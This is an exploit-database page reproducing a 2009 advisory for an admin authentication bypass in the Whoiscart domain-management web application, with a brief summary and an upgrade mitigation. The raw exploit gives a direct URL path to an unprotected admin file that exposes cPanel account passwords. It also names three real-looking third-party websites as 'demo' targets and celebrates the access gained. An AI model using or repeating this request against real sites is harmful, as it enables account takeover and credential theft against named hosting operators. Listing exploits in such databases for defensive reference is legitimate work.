header-logo
Suggest Exploit
vendor:
Whoiscart
by:
Black Dream
8,8
CVSS
HIGH
Admin Bypass
287
CWE
Product Name: Whoiscart
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2009-4456
CPE: a:whoiscart:whoiscart:1.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

WHOISCART ADMIN BYPASS

Whoiscart is a web-based application that allows users to manage their domain names. It is vulnerable to an authentication bypass vulnerability. This allows an attacker to gain access to the administrative panel without authentication.

Mitigation:

Upgrade to the latest version of Whoiscart.
Source

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\
+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     WHOISCART ADMIN BYPASS                                        |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
| HoMe   : www.sec-r1z.com                                                          |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: WHOISCART                                                                |
| Home...: http://whoiscart.net                                                     |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit:                                                                          |
|                                                                                   |
| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm                |
|                                                                                   |
| [+] Demo                                                                          |
|                                                                                   |
| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm   |
|                                                                                   |
| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm       |
|                                                                                   |
| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm      |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] accout[pwd] xD   Pure admin                         |
|                                                                                   |
| [+] Enjoy xD                                                                      |             
+-----------------------------------------------------------------------------------|

+===================================================================================+
|                                                                                   |
| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
|                       And All #sec-r1z memb3rz!!!!                                |
+===================================================================================+
E0D|F

# milw0rm.com [2009-06-29]

Navigation

Suggest Exploit

Services By CQR